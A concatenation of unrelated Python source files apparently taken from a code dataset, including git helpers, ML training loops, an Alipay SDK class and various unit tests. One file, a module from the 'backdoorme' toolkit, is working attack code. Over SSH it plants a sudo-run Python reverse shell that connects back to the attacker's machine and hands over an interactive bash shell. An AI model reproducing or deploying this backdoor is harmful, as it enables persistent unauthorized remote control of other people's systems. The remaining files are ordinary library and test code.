def git_config_bool(option: str) -> bool:
"""
Return a boolean git config value, defaulting to False.
"""
return git_config(option) == "true"
def git_editor() -> str:
"""
Get the command name of the editor Git will launch.
"""
return run_simple_command("git var GIT_EDITOR")
def git_edit(filename: Path) -> None:
"""Edit a file using the same editor Git chooses."""
click.edit(filename=str(filename), editor=git_editor())
def git_add(filename: Path) -> None:
"""Git add a file. If it fails, sys.exit."""
ret = subprocess.call(["git", "add", str(filename)])
if ret == 0:
logger.info("Added {}".format(filename))
else:
logger.error("Couldn't add {}".format(filename))
sys.exit(ret)
def git_rm(filename: Path) -> None:
"""Git rm a file. If it fails, sys.exit."""
ret = subprocess.call(["git", "rm", str(filename)])
if ret == 0:
logger.info("Removed {}".format(filename))
else:
logger.error("Couldn't remove {}".format(filename))
sys.exit(ret)
|
backdoors/shell/pyth.py | mehrdad-shokri/backdoorme | 796 | 11096461 | <reponame>mehrdad-shokri/backdoorme<filename>backdoors/shell/pyth.py
from backdoors.backdoor import *
class Pyth(Backdoor):
prompt = Fore.RED + "(py) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Python module..."
self.core = core
self.options = {
"port" : Option("port", 53922, "port to connect to", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = INFO + "Uses a short python script to listen for commands and send output back to the user."
def get_command(self):
command = "echo " + self.core.curtarget.pword + " | sudo -S python -c \"import socket, subprocess, os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); \
s.connect(('" + self.core.localIP + "', " + str(self.get_value("port")) + ")); \
os.dup2(s.fileno(),0); \
os.dup2(s.fileno(),1); \
os.dup2(s.fileno(),2); \
subprocess.call(['/bin/bash', '-i'])\" "
#print(command)
return command
def do_exploit(self, args):
self.listen()
self.core.curtarget.ssh.exec_command(self.get_command())
print(GOOD + "Python backdoor on %s attempted." % self.get_value("port"))
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit() |
mindspore/python/mindspore/_extends/remote/kernel_build_server_ascend.py | PowerOlive/mindspore | 3,200 | 11096474 | <reponame>PowerOlive/mindspore
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""kernel build server for ascend"""
import sys
import warnings
import json
from mindspore._extends.parallel_compile.tbe_compiler.tbe_job_manager import TbeJobManager
from mindspore._extends.remote.kernel_build_server import Messager, get_logger, AkgBuilder
class AscendMessager(Messager):
"""
Ascend Messager
It works as a server, communicating with c++ client.
"""
def __init__(self, fdin, fdout):
super().__init__(fdin, fdout)
get_logger().info("[TRACE] Ascend Messager init...")
self.tbe_builder = TbeJobManager()
self.akg_builder = AkgBuilder("ASCEND")
def handle(self):
"""
Communicate with remote client.
Reference protocol between them at PR#3821 and PR#3935
"""
arg = self.get_message()
if arg.startswith('AKG'):
self.akg_builder.handle(self, arg)
else:
job_json = dict()
try:
job_json = json.loads(arg)
except json.decoder.JSONDecodeError:
get_logger().error("[TRACE] Request is not a json message: {}".format(arg))
self.send_ack(False)
self.exit()
finally:
pass
if "job_type" in job_json:
res = self.tbe_builder.job_handler(arg)
self.send_res(res)
else:
get_logger().error("[TRACE] Request is not a TBE Job message: {}".format(arg))
self.send_ack(False)
self.exit()
def exit(self):
self.tbe_builder.reset()
get_logger().info("[TRACE] Ascend Messager Exit...")
exit()
if __name__ == '__main__':
warnings.simplefilter("ignore")
if len(sys.argv) != 3:
raise Exception('Incorrect argv: {}'.format(sys.argv))
get_logger().debug(f"[TRACE] argv: {str(sys.argv)}")
messager = AscendMessager(int(sys.argv[1]), int(sys.argv[2]))
messager.run()
|
VisualBERT/mmf/trainers/core/evaluation_loop.py | Fostereee/Transformer-MM-Explainability | 322 | 11096498 | # Copyright (c) Facebook, Inc. and its affiliates.
import logging
from abc import ABC
from typing import Any, Dict, Tuple, Type
import torch
import tqdm
from VisualBERT.mmf.common.meter import Meter
from VisualBERT.mmf.common.report import Report
from VisualBERT.mmf.common.sample import to_device
from VisualBERT.mmf.utils.distributed import is_master
from VisualBERT.mmf.models.transformers.backends import ExplanationGenerator
from VisualBERT import perturbation_arguments
logger = logging.getLogger(__name__)
class TrainerEvaluationLoopMixin(ABC):
def evaluation_loop(
self, loader, use_tqdm: bool = False, single_batch: bool = False
) -> Tuple[Dict[str, Any], Type[Meter]]:
meter = Meter()
with torch.no_grad():
self.model.eval()
disable_tqdm = not use_tqdm or not is_master()
combined_report = None
for batch in tqdm.tqdm(loader, disable=disable_tqdm):
report = self._forward(batch)
self.update_meter(report, meter)
# accumulate necessary params for metric calculation
if combined_report is None:
combined_report = report
else:
combined_report.accumulate_tensor_fields_and_loss(
report, self.metrics.required_params
)
combined_report.batch_size += report.batch_size
if single_batch is True:
break
combined_report.metrics = self.metrics(combined_report, combined_report)
self.update_meter(combined_report, meter, eval_mode=True)
# enable train mode again
self.model.train()
return combined_report, meter
def prediction_loop(self, dataset_type: str) -> None:
reporter = self.dataset_loader.get_test_reporter(dataset_type)
with torch.no_grad():
self.model.eval()
logger.info(f"Starting {dataset_type} inference predictions")
while reporter.next_dataset():
dataloader = reporter.get_dataloader()
for batch in tqdm.tqdm(dataloader):
prepared_batch = reporter.prepare_batch(batch)
prepared_batch = to_device(prepared_batch, torch.device("cuda"))
with torch.cuda.amp.autocast(enabled=self.training_config.fp16):
model_output = self.model(prepared_batch)
report = Report(prepared_batch, model_output)
reporter.add_to_report(report, self.model)
logger.info("Finished predicting")
self.model.train()
class TrainerEvaluationLoopMixinPert(ABC):
def evaluation_loop(self, loader, on_test_end, use_tqdm: bool = False):
self.model.eval()
expl = ExplanationGenerator.SelfAttentionGenerator(self.model)
method = perturbation_arguments.args.method
pert_type = "pos" if perturbation_arguments.args.is_positive_pert else "neg"
modality = "text" if perturbation_arguments.args.is_text_pert else "image"
num_samples = perturbation_arguments.args.num_samples
method_expl = {"transformer_attribution": expl.generate_transformer_att,
"ours_no_lrp": expl.generate_ours,
"partial_lrp": expl.generate_partial_lrp,
"raw_attn": expl.generate_raw_attn,
"attn_gradcam": expl.generate_attn_gradcam,
"rollout": expl.generate_rollout}
i = 0
# saving cams per method for all the samples
self.model.eval()
disable_tqdm = not use_tqdm or not is_master()
if modality == "image":
steps = [0, 0.5, 0.75, 0.95, 0.96, 0.97, 0.98, 0.99, 1]
else:
steps = [0, 0.25, 0.5, 0.75, 0.8, 0.85, 0.9, 0.95, 1]
step_acc = [0] * len(steps)
print("test type {0} pert type {1} expl type {2}".format(modality, pert_type, method))
for batch in tqdm.tqdm(loader, disable=disable_tqdm):
method_cam = method_expl[method](batch)
if pert_type == "pos":
method_cam *= -1
if modality == "image":
input_mask = batch['input_mask']
bbox_scores = method_cam[0, input_mask.sum(1):]
image_boxes_len = len(bbox_scores)
image_features = batch['image_feature_0'].clone()
image_bboxes = batch['image_info_0']['bbox'][0].copy()
for step_idx, step in enumerate(steps):
curr_num_tokens = int((1 - step) * image_boxes_len)
# find top step boxes
_, top_bboxes_indices = bbox_scores.topk(k=curr_num_tokens, dim=-1)
top_bboxes_indices = top_bboxes_indices.cpu().data.numpy()
# remove the top step boxes from the batch info
batch['image_feature_0'] = image_features[:, top_bboxes_indices, :]
batch['image_info_0']['bbox'][0] = image_bboxes[top_bboxes_indices]
batch['image_info_0']['max_features'] = torch.tensor(curr_num_tokens).to(batch['image_feature_0'].device).view(1)
batch['image_info_0']['num_boxes'][0] = curr_num_tokens
report = self._forward(batch)
step_acc[step_idx] += report["targets"][0,report["scores"].argmax()].item()
i += 1
if i > num_samples:
break
else:
input_mask = batch['input_mask'].clone()
# the CLS here is ?
cls_index = (input_mask.sum(1) - 2).item()
seg_ids = batch["segment_ids"].clone()
# we don't count the ? token since it's the equivalent to CLS here
# and we want to keep the CLS intact
text_scores = method_cam[0, 1:cls_index]
text_len = len(text_scores)
input_ids = batch['input_ids'].clone()
tokens = batch['tokens'].copy()
for step_idx, step in enumerate(steps):
curr_num_tokens = int((1 - step) * text_len)
# find top step tokens
_, top_bboxes_indices = text_scores.topk(k=curr_num_tokens, dim=-1)
top_bboxes_indices = top_bboxes_indices.cpu().data.numpy()
# sorting for positional embedding
top_bboxes_indices = list(top_bboxes_indices)
# add the last 2 tokens (CLS+SEP)
top_bboxes_indices = [0, cls_index, cls_index+1] +\
[top_bboxes_indices[i] + 1 for i in range(len(top_bboxes_indices))]
top_bboxes_indices = sorted(top_bboxes_indices)
# modify the first tokens of the input mask
input_mask_indices = top_bboxes_indices + \
[i for i in range(input_mask.sum(1), input_mask.shape[1])]
# remove the top step boxes from the batch info
batch['input_ids'] = input_ids[:, top_bboxes_indices]
batch['tokens'] = [[tokens[0][i] for i in top_bboxes_indices]]
batch['input_mask'] = input_mask[:, input_mask_indices]
batch["segment_ids"] = seg_ids[:, input_mask_indices]
report = self._forward(batch)
step_acc[step_idx] += report["targets"][0, report["scores"].argmax()].item()
i += 1
if i > num_samples:
break
print("pert type {0}".format(pert_type))
step_acc = [acc / num_samples * 100 for acc in step_acc]
print(step_acc)
|
onir/datasets/query_iter.py | tgeral68/OpenNIR | 140 | 11096510 | from onir import util
@util.allow_redefinition_iter
def query_iter(dataset,
fields: set,
shuf: bool = False,
random=None
):
qids = dataset.all_query_ids()
if shuf:
qids = list(qids)
random.shuffle(qids)
for qid in qids:
record = dataset.build_record(fields, query_id=qid)
yield {f: record[f] for f in fields}
class QueryIter:
def __init__(self, dataset, fields, shuf=False, random=None):
self.it = query_iter(dataset, fields, shuf, random)
self.consumed = 0
self.len = dataset.num_queries()
def __next__(self):
self.consumed += 1
return next(self.it)
def __iter__(self):
return self
def __length_hint__(self):
return max(self.len - self.consumed, 0)
|
torch/distributed/constants.py | MagiaSN/pytorch | 206 | 11096521 | from datetime import timedelta
# Default process group wide timeout, if applicable.
# This only applies to the gloo and nccl backends
# (only if NCCL_BLOCKING_WAIT or NCCL_ASYNC_ERROR_HANDLING is set to 1).
# To make an attempt at backwards compatibility with THD, we use an
# extraordinarily high default timeout, given that THD did not have timeouts.
default_pg_timeout = timedelta(minutes=30)
|
alipay/aop/api/response/AlipayFundJointaccountDetailQueryResponse.py | antopen/alipay-sdk-python-all | 213 | 11096542 | <filename>alipay/aop/api/response/AlipayFundJointaccountDetailQueryResponse.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.JointAccountQuotaRespDTO import JointAccountQuotaRespDTO
from alipay.aop.api.domain.AuthorizedRuleDTO import AuthorizedRuleDTO
from alipay.aop.api.domain.InviteResultDTO import InviteResultDTO
from alipay.aop.api.domain.JointAccountMemberInfoRespDTO import JointAccountMemberInfoRespDTO
class AlipayFundJointaccountDetailQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayFundJointaccountDetailQueryResponse, self).__init__()
self._account_id = None
self._account_name = None
self._account_quota = None
self._account_status = None
self._agreement_no = None
self._authorized_rule = None
self._available_balance = None
self._biz_scene = None
self._creator_id = None
self._creator_out_id = None
self._freeze_balance = None
self._invite_result_list = None
self._member_list = None
self._product_code = None
@property
def account_id(self):
return self._account_id
@account_id.setter
def account_id(self, value):
self._account_id = value
@property
def account_name(self):
return self._account_name
@account_name.setter
def account_name(self, value):
self._account_name = value
@property
def account_quota(self):
return self._account_quota
@account_quota.setter
def account_quota(self, value):
if isinstance(value, list):
self._account_quota = list()
for i in value:
if isinstance(i, JointAccountQuotaRespDTO):
self._account_quota.append(i)
else:
self._account_quota.append(JointAccountQuotaRespDTO.from_alipay_dict(i))
@property
def account_status(self):
return self._account_status
@account_status.setter
def account_status(self, value):
self._account_status = value
@property
def agreement_no(self):
return self._agreement_no
@agreement_no.setter
def agreement_no(self, value):
self._agreement_no = value
@property
def authorized_rule(self):
return self._authorized_rule
@authorized_rule.setter
def authorized_rule(self, value):
if isinstance(value, AuthorizedRuleDTO):
self._authorized_rule = value
else:
self._authorized_rule = AuthorizedRuleDTO.from_alipay_dict(value)
@property
def available_balance(self):
return self._available_balance
@available_balance.setter
def available_balance(self, value):
self._available_balance = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def creator_id(self):
return self._creator_id
@creator_id.setter
def creator_id(self, value):
self._creator_id = value
@property
def creator_out_id(self):
return self._creator_out_id
@creator_out_id.setter
def creator_out_id(self, value):
self._creator_out_id = value
@property
def freeze_balance(self):
return self._freeze_balance
@freeze_balance.setter
def freeze_balance(self, value):
self._freeze_balance = value
@property
def invite_result_list(self):
return self._invite_result_list
@invite_result_list.setter
def invite_result_list(self, value):
if isinstance(value, list):
self._invite_result_list = list()
for i in value:
if isinstance(i, InviteResultDTO):
self._invite_result_list.append(i)
else:
self._invite_result_list.append(InviteResultDTO.from_alipay_dict(i))
@property
def member_list(self):
return self._member_list
@member_list.setter
def member_list(self, value):
if isinstance(value, list):
self._member_list = list()
for i in value:
if isinstance(i, JointAccountMemberInfoRespDTO):
self._member_list.append(i)
else:
self._member_list.append(JointAccountMemberInfoRespDTO.from_alipay_dict(i))
@property
def product_code(self):
return self._product_code
@product_code.setter
def product_code(self, value):
self._product_code = value
def parse_response_content(self, response_content):
response = super(AlipayFundJointaccountDetailQueryResponse, self).parse_response_content(response_content)
if 'account_id' in response:
self.account_id = response['account_id']
if 'account_name' in response:
self.account_name = response['account_name']
if 'account_quota' in response:
self.account_quota = response['account_quota']
if 'account_status' in response:
self.account_status = response['account_status']
if 'agreement_no' in response:
self.agreement_no = response['agreement_no']
if 'authorized_rule' in response:
self.authorized_rule = response['authorized_rule']
if 'available_balance' in response:
self.available_balance = response['available_balance']
if 'biz_scene' in response:
self.biz_scene = response['biz_scene']
if 'creator_id' in response:
self.creator_id = response['creator_id']
if 'creator_out_id' in response:
self.creator_out_id = response['creator_out_id']
if 'freeze_balance' in response:
self.freeze_balance = response['freeze_balance']
if 'invite_result_list' in response:
self.invite_result_list = response['invite_result_list']
if 'member_list' in response:
self.member_list = response['member_list']
if 'product_code' in response:
self.product_code = response['product_code']
|
pywt/tests/test_wpnd.py | tbbharaj/pywt | 1,435 | 11096551 | <gh_stars>1000+
#!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from itertools import product
from functools import reduce
import operator
import numpy as np
from numpy.testing import (assert_allclose, assert_, assert_raises,
assert_equal)
import pywt
def test_traversing_tree_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
assert_(np.all(wp.data == x))
assert_(wp.path == '')
assert_(wp.level == 0)
assert_(wp.maxlevel == 3)
assert_allclose(wp['aa'].data, np.array([[3., 7., 11., 15.]] * 4),
rtol=1e-12)
assert_allclose(wp['da'].data, np.zeros((4, 4)), rtol=1e-12, atol=1e-14)
assert_allclose(wp['ad'].data, -np.ones((4, 4)), rtol=1e-12, atol=1e-14)
assert_allclose(wp['dd'].data, np.zeros((4, 4)), rtol=1e-12, atol=1e-14)
assert_allclose(wp['aa'*2].data, np.array([[10., 26.]] * 2), rtol=1e-12)
# __getitem__ using a tuple acces instead
assert_allclose(wp[('aa', 'aa')].data, np.array([[10., 26.]] * 2),
rtol=1e-12)
assert_(wp['aa']['aa'].data is wp['aa'*2].data)
assert_allclose(wp['aa'*3].data, np.array([[36.]]), rtol=1e-12)
assert_raises(IndexError, lambda: wp['aa'*(wp.maxlevel+1)])
assert_raises(ValueError, lambda: wp['f'])
# getitem input must be a string or tuple of strings
assert_raises(TypeError, wp.__getitem__, (5, 3))
assert_raises(TypeError, wp.__getitem__, 5)
def test_accessing_node_attributes_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
assert_allclose(wp['aa'+'ad'].data, np.zeros((2, 2)) - 4, rtol=1e-12)
assert_(wp['aa'+'ad'].path == 'aa'+'ad')
assert_(wp['aa'+'ad'].node_name == 'ad')
assert_(wp['aa'+'ad'].parent.path == 'aa')
assert_allclose(wp['aa'+'ad'].parent.data,
np.array([[3., 7., 11., 15.]] * 4), rtol=1e-12)
# can also index via a tuple instead of concatenated strings
assert_(wp[('aa', 'ad')].level == 2)
assert_(wp[('aa', 'ad')].maxlevel == 3)
assert_(wp[('aa', 'ad')].mode == 'symmetric')
# can access a node's path as either a single string or in tuple form
node = wp[('ad', 'dd')]
assert_(node.path == 'addd')
assert_(node.path_tuple == ('ad', 'dd'))
def test_collecting_nodes_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
assert_(len(wp.get_level(0)) == 1)
assert_(wp.get_level(0)[0].path == '')
# First level
assert_(len(wp.get_level(1)) == 4)
assert_(
[node.path for node in wp.get_level(1)] == ['aa', 'ad', 'da', 'dd'])
# Second and third levels
for lev in [2, 3]:
assert_(len(wp.get_level(lev)) == (2**x.ndim)**lev)
paths = [node.path for node in wp.get_level(lev)]
expected_paths = [
reduce(operator.add, p) for
p in sorted(product(['aa', 'ad', 'da', 'dd'], repeat=lev))]
assert_(paths == expected_paths)
def test_data_reconstruction_delete_nodes_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
# The user must supply either data or axes
assert_raises(ValueError, pywt.WaveletPacketND, data=None, wavelet='db1',
axes=None)
new_wp = pywt.WaveletPacketND(data=None, wavelet='db1', mode='symmetric',
axes=range(x.ndim))
new_wp['ad'+'da'] = wp['ad'+'da'].data
new_wp['ad'*2] = wp['ad'+'da'].data
new_wp['ad'+'dd'] = np.zeros((2, 2), dtype=np.float64)
new_wp['aa'] = [[3.0, 7.0, 11.0, 15.0]] * 4
new_wp['dd'] = np.zeros((4, 4), dtype=np.float64)
new_wp['da'] = wp['da'] # all zeros
assert_allclose(new_wp.reconstruct(update=False),
np.array([[1.5, 1.5, 3.5, 3.5, 5.5, 5.5, 7.5, 7.5]] * 8),
rtol=1e-12)
new_wp['ad'+'aa'] = wp['ad'+'aa'].data
assert_allclose(new_wp.reconstruct(update=False), x, rtol=1e-12)
del(new_wp['ad'+'aa'])
# TypeError on accessing deleted node
assert_raises(TypeError, lambda: new_wp['ad'+'aa'])
new_wp['ad'+'aa'] = wp['ad'+'aa'].data
assert_(new_wp.data is None)
assert_allclose(new_wp.reconstruct(update=True), x, rtol=1e-12)
assert_allclose(new_wp.data, x, rtol=1e-12)
# TODO: decompose=True
def test_wavelet_packet_dtypes():
shape = (16, 8, 8)
for dtype in [np.float32, np.float64, np.complex64, np.complex128]:
x = np.random.randn(*shape).astype(dtype)
if np.iscomplexobj(x):
x = x + 1j*np.random.randn(*shape).astype(x.real.dtype)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
# no unnecessary copy made
assert_(wp.data is x)
# full decomposition
wp.get_level(wp.maxlevel)
# reconstruction from coefficients should preserve dtype
r = wp.reconstruct(False)
assert_equal(r.dtype, x.dtype)
assert_allclose(r, x, atol=1e-6, rtol=1e-6)
def test_wavelet_packet_axes():
rstate = np.random.RandomState(0)
shape = (32, 16, 8)
x = rstate.standard_normal(shape)
for axes in [(0, 1), 1, (-3, -2, -1), (0, 2), (1, )]:
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric',
axes=axes)
# partial decomposition
nodes = wp.get_level(1)
# size along the transformed axes has changed
for ax2 in range(x.ndim):
if ax2 in tuple(np.atleast_1d(axes) % x.ndim):
nodes[0].data.shape[ax2] < x.shape[ax2]
else:
nodes[0].data.shape[ax2] == x.shape[ax2]
# recontsruction from coefficients should preserve dtype
r = wp.reconstruct(False)
assert_equal(r.dtype, x.dtype)
assert_allclose(r, x, atol=1e-12, rtol=1e-12)
# must have non-duplicate axes
assert_raises(ValueError, pywt.WaveletPacketND, data=x, wavelet='db1',
axes=(0, 0))
|
cinder/tests/unit/backup/drivers/test_backup_glusterfs.py | helenwalsh/cinder | 571 | 11096601 | # Copyright (c) 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for GlusterFS backup driver."""
import os
from unittest import mock
from os_brick.remotefs import remotefs as remotefs_brick
from cinder.backup.drivers import glusterfs
from cinder import context
from cinder import exception
from cinder.tests.unit import test
from cinder import utils
FAKE_BACKUP_MOUNT_POINT_BASE = '/fake/mount-point-base'
FAKE_HOST = 'fake_host'
FAKE_VOL_NAME = 'backup_vol'
FAKE_BACKUP_SHARE = '%s:%s' % (FAKE_HOST, FAKE_VOL_NAME)
FAKE_BACKUP_PATH = os.path.join(FAKE_BACKUP_MOUNT_POINT_BASE,
'e51e43e3c63fd5770e90e58e2eafc709')
class BackupGlusterfsShareTestCase(test.TestCase):
def setUp(self):
super(BackupGlusterfsShareTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_check_configuration(self):
self.override_config('glusterfs_backup_share', FAKE_BACKUP_SHARE)
self.mock_object(glusterfs.GlusterfsBackupDriver,
'_init_backup_repo_path',
return_value=FAKE_BACKUP_PATH)
driver = glusterfs.GlusterfsBackupDriver(self.ctxt)
driver.check_for_setup_error()
def test_check_configuration_no_backup_share(self):
self.override_config('glusterfs_backup_share', None)
self.mock_object(glusterfs.GlusterfsBackupDriver,
'_init_backup_repo_path',
return_value=FAKE_BACKUP_PATH)
driver = glusterfs.GlusterfsBackupDriver(self.ctxt)
self.assertRaises(exception.InvalidConfigurationValue,
driver.check_for_setup_error)
def test_init_backup_repo_path(self):
self.override_config('glusterfs_backup_share', FAKE_BACKUP_SHARE)
self.override_config('glusterfs_backup_mount_point',
FAKE_BACKUP_MOUNT_POINT_BASE)
mock_remotefsclient = mock.Mock()
mock_remotefsclient.get_mount_point = mock.Mock(
return_value=FAKE_BACKUP_PATH)
self.mock_object(glusterfs.GlusterfsBackupDriver,
'check_for_setup_error')
self.mock_object(remotefs_brick, 'RemoteFsClient',
return_value=mock_remotefsclient)
self.mock_object(os, 'getegid',
return_value=333333)
self.mock_object(utils, 'get_file_gid',
return_value=333333)
self.mock_object(utils, 'get_file_mode',
return_value=00000)
self.mock_object(utils, 'get_root_helper')
with mock.patch.object(glusterfs.GlusterfsBackupDriver,
'_init_backup_repo_path'):
driver = glusterfs.GlusterfsBackupDriver(self.ctxt)
self.mock_object(driver, '_execute')
path = driver._init_backup_repo_path()
self.assertEqual(FAKE_BACKUP_PATH, path)
utils.get_root_helper.called_once()
mock_remotefsclient.mount.assert_called_once_with(FAKE_BACKUP_SHARE)
mock_remotefsclient.get_mount_point.assert_called_once_with(
FAKE_BACKUP_SHARE)
|
dnachisel/biotools/formatting_operations.py | simone-pignotti/DnaChisel | 124 | 11096646 | """Text and number formatting operations"""
from copy import deepcopy
import json
import numpy as np
def round_all_numbers_in_dict(d, rounding_digits=2, outplace=True):
""" Return a new version of dict d with all floats rounded to N digits."""
if outplace:
d = deepcopy(d)
for k, v in d.items():
if isinstance(v, float):
d[k] = np.round(v, rounding_digits)
if isinstance(v, dict):
round_all_numbers_in_dict(v, rounding_digits, outplace=False)
return d
def dict_to_pretty_string(d, rounding_digits=2, indent=2):
"""Return a nicely JSON-like formatted string to print a dict."""
d = round_all_numbers_in_dict(d, rounding_digits)
formatted_text = json.dumps(d, indent=indent)
for char in '{}",':
formatted_text = formatted_text.replace(char, "")
return formatted_text
def score_to_formatted_string(score, characters=9):
"""Transform a number (score) into a best-format string.
The format will be either int (2234), float (10.234) or engineering
(1.20E5), whichever is shorter. The score is then padded with left
whitespaces to obtained the desired number of ``characters``."""
raw = str(int(score) if (int(score) == score) else score)
as_float = "%.02f" % score
as_eng = "%.02E." % score
return min([raw, as_float, as_eng], key=len).rjust(characters) |
qf_lib_tests/unit_tests/portfolio_construction/test_black_litterman.py | webclinic017/qf-lib | 198 | 11096675 | <gh_stars>100-1000
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import TestCase
import numpy as np
from pandas import DataFrame, Series
from qf_lib.portfolio_construction.black_litterman.black_litterman import BlackLitterman
# THIS TEST REQUIRES TAU CALCULATION AS: 1 / nr_of_observations
class TestBlackLitterman(TestCase):
@classmethod
def setUpClass(cls):
cls.hist_cov_data = np.array([[0.00490, 0.00672, 0.01050, 0.01680],
[0.00672, 0.01440, 0.02520, 0.03600],
[0.01050, 0.02520, 0.09000, 0.14400],
[0.01680, 0.03600, 0.14400, 0.36000]])
cls.weights_data = [0.05, 0.40, 0.45, 0.10]
cls.names = ['A1', 'A2', 'A3', 'A4']
cls.hist_cov = DataFrame(cls.hist_cov_data, columns=cls.names, index=cls.names)
cls.weights = Series(data=cls.weights_data, index=cls.names)
cls.number_of_data_points = 120
def test_bl_model_components(self):
bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points)
print("=====> LAMBDA")
lambda_ = bl.calculate_lambda()
print(lambda_)
self.assertAlmostEqual(lambda_, 2.2369058, places=6)
prior_mean, prior_cov = bl.calculate_prior()
print("=====> Prior Mean")
print(prior_mean)
exact_mean = np.zeros(4)
exact_mean[0] = 0.0208882
exact_mean[1] = 0.0470556
exact_mean[2] = 0.1465285
exact_mean[3] = 0.2595706
self.assertTrue(np.allclose(prior_mean, exact_mean, rtol=0, atol=1e-6))
print("=====> Prior COV")
print(prior_cov)
exact_cov = np.zeros([4, 4])
exact_cov[0, :] = np.array([0.004900, 0.006720, 0.010500, 0.016800])
exact_cov[1, :] = np.array([0.006720, 0.014400, 0.025200, 0.036000])
exact_cov[2, :] = np.array([0.010500, 0.025200, 0.090000, 0.144000])
exact_cov[3, :] = np.array([0.016800, 0.036000, 0.144000, 0.360000])
exact_cov = 1 / 120 * exact_cov # tau * cov
self.assertTrue(np.allclose(prior_cov, exact_cov, rtol=0, atol=1e-6))
print("=====> Tau")
print(bl.tau)
self.assertAlmostEqual(bl.tau, 0.0083333, places=6)
def test_bl_model_views(self):
bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points)
bl.add_relative_view(2, 0, 0.1, 0.02481598)
bl.add_absolute_view(1, 0.03, 0.010954451)
print("=====> P")
print(bl.P)
exact_P = np.zeros([2, 4])
exact_P[0, :] = np.array([-1.0, 0.0, 1.0, 0.0])
exact_P[1, :] = np.array([0.0, 1.0, 0.0, 0.0])
self.assertTrue(np.allclose(bl.P, exact_P, rtol=0, atol=1e-7))
print("=====> Q")
print(bl.Q)
exact_Q = np.zeros([2, 1])
exact_Q[0, 0] = 0.1
exact_Q[1, 0] = 0.03
self.assertTrue(np.allclose(bl.Q, exact_Q, rtol=0, atol=1e-7))
print("=====> OMEGA")
print(bl.Omega)
exact_Omega = np.zeros([2, 2])
exact_Omega[0, 0] = 0.00061583
exact_Omega[1, 1] = 0.00012000
self.assertTrue(np.allclose(bl.Omega, exact_Omega, rtol=0, atol=1e-7))
def test_bl_model_posterior(self):
bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points)
bl.add_relative_view(2, 0, 0.1, 0.02481598)
bl.add_absolute_view(1, 0.03, 0.010954451)
posterior_mean, posterior_cov = bl.calculate_posterior()
print("=====> POSTERIOR Mean")
print(posterior_mean)
exact_mean = np.zeros(4)
exact_mean[0] = 0.016769
exact_mean[1] = 0.037529
exact_mean[2] = 0.124758
exact_mean[3] = 0.226997
self.assertTrue(np.allclose(posterior_mean, exact_mean, rtol=0, atol=1e-6))
print("=====> POSTERIOR COV")
print(posterior_cov)
exact_cov = np.zeros([4, 4])
exact_cov[0, :] = np.array([0.004928, 0.006747, 0.010533, 0.016862])
exact_cov[1, :] = np.array([0.006747, 0.014455, 0.025269, 0.036091])
exact_cov[2, :] = np.array([0.010533, 0.025269, 0.090320, 0.144533])
exact_cov[3, :] = np.array([0.016862, 0.036091, 0.144533, 0.361961])
self.assertTrue(np.allclose(posterior_cov, exact_cov, rtol=0, atol=1e-6))
if __name__ == '__main__':
unittest.main()
|
tests/unpickle-strtree.py | Jeremiah-England/Shapely | 2,382 | 11096700 | # See test_strtree.py::test_pickle_persistence
import sys
import os
sys.path.append(os.getcwd())
import pickle
from shapely.geometry import Point
from shapely.geos import geos_version
if __name__ == "__main__":
pickled_strtree = sys.stdin.buffer.read()
print("received pickled strtree:", repr(pickled_strtree))
strtree = pickle.loads(pickled_strtree)
# Exercise API.
print("calling \"query()\"...")
strtree.query(Point(0, 0))
if geos_version >= (3, 6, 0):
print("calling \"nearest()\"...")
strtree.nearest(Point(0, 0))
else:
print("skipping \"nearest()\"")
print("done")
|
